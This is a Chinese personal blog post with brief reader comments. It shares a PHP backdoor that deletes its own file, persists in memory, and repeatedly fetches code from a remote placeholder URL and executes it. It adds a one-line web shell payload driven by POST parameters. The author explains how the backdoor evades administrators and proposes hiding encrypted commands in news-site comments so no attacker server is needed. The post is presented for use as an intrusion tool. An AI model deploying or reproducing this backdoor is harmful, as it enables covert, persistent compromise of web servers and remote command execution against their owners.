分享一个非常淫荡的PHP后门 - 起点终站

我们应该感谢相遇,无论结局是喜是悲....
分享一个非常淫荡的PHP后门
  • 首页 > IT技术
  • 作者:起点终站
  • 2016年8月3日 10:45 星期三
  • 浏览:21436
  • 字号:
  • 评论:6
  • <?php
    unlink($_SERVER['SCRIPT_FILENAME']); 
    ignore_user_abort(true); 
    set_time_limit(0); 
    $remote_file = 'http://xxx/xxx.txt'; 
    while($code = file_get_contents($remote_file)){ 
    @eval($code); 
    sleep(5)
    }; 
    ?>

    后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接 在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 例如txt里面写了一句这样的代码

     file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>"); 


    这样就会在目录下又生成一个木马 如果对方写了是执行命令 。。。 这段代码纯粹变成了一个等待命令的木马。。 而且管理员检查木马文件的时候 都找不到。。。 因为文件已经删除了 木马却注入在php-fpm内sleep(5); 五秒就去远程读取一下指令。。。 ........ 打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。 黑客连服务器都省了。。。 黑客只需要去网易新闻评论窗口内写入自己的代码就行 怕别人看懂? 直接加密 采用对称加密算法。。没有秘钥 谁也看不懂啥意思 秘钥在这段后门里面写着 所以非常安全

      您阅读这篇文章共花了:  
    本文作者:起点终站      文章标题: 分享一个非常淫荡的PHP后门
    本文地址:https://blog.hellozwh.com/?post=159
    版权声明:若无注明,本文皆为“起点终站”原创,转载请保留文章出处。
    • blogger
    秦时明月2016-08-18 12:37
    重启一下不就没了
    起点终站 没错,我就是那个帅逼站长2016-08-18 12:40
    哈。,是的
    宅男俱乐部2016-08-03 18:25
    看不懂哈哈
    起点终站 没错,我就是那个帅逼站长2016-08-03 19:20
    [哈哈] 随便看看就是了
    酷喵2016-08-03 15:39
    沙发啦~
    起点终站 没错,我就是那个帅逼站长2016-08-03 15:57
    返回顶部| 首页| 手气不错| 网站地图| sitemap| 装逼生成器| 站长介绍|

    Copyright © 2016-2019 起点终站 闽ICP备16011094号-1